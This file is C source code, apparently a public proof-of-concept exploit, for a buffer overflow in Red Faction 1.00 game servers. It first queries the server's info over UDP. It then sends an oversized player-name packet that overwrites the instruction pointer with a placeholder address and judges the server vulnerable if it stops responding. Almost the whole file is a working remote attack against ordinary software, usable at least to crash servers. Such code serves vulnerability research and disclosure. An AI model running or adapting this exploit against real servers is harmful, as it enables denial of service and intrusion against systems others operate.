/*

by Luigi Auriemma

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>

    #define ONESEC  1
#endif



#define VER     "0.1"
#define BUFFSZ  2048
#define PORT    7755
#define TIMEOUT 5
#define INFO    "\x00\x00\x00\x00"
#define RETADDR "\xde\xc0\xad\xde"  // 0xdeadc0de
#define PCK    \
        "\x00\x02" \
        "\x00\x00" \
        "\x20"      /* player's name follows */ \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaa" RETADDR "aaaaaaaaaaaaa\0"



int timeout(int sock);
u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    int         sd,
                err,
                psz;
    u_short     port = PORT;
    u_char      *buff,
                pck[] = PCK;
    struct  sockaddr_in peer;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "Red Faction demo and retail 1.00 server buffer overflow "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <server> [port(%d)]\n"
            "\n", argv[0], PORT);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr  = resolv(argv[1]);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;
    psz                   = sizeof(peer);

    printf("\nTarget %s:%hu\n",
        inet_ntoa(peer.sin_addr), port);


        /* INFORMATION */

    fputs("\n"
        "Retrying informations\n"
        "---------------------\n", stdout);
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, psz)
        < 0) std_err();
    if(timeout(sd) < 0) {
        fputs("\nError: socket timeout, probably server is not online\n", stdout);
        exit(1);
    }

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    if(recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz)
        < 0) std_err();
    close(sd);

    err = strlen(buff + 5) + 1;
    printf("Server Version: %d\n", buff[4]);
    printf("Server name:    %s\n", buff + 5);
    fputs("Type of game:   ", stdout);
    switch(buff[err + 5]) {
        case 0: fputs("deathmatch\n", stdout); break;
        case 1: fputs("capture the flag\n", stdout); break;
        case 2: fputs("team deathmatch\n", stdout); break;
        default: fputs("unknown\n", stdout); break;
    }
    printf("Players:        %d\n", buff[err + 6]);
    printf("Max players:    %d\n", buff[err + 7]);
    printf("Map name:       %s\n\n", buff + err + 8);


        /* ATTACK */

    pck[4] = buff[4];           // version
    *(u_short *)(pck + 2) = sizeof(PCK) - 5;
    printf("EIP will be overwritten with 0x%08x\n", *(u_int *)RETADDR);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    if(sendto(sd, pck, sizeof(pck) - 1, 0, (struct sockaddr *)&peer, psz)
        < 0) std_err();

    if(timeout(sd) < 0) {
        fputs("\nServer IS vulnerable!!!!!!\n\n", stdout);
    } else {
        fputs("\nServer is not vulnerable\n\n", stdout);
    }

    close(sd);
    return(0);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct hostent *hp;
    u_int host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif



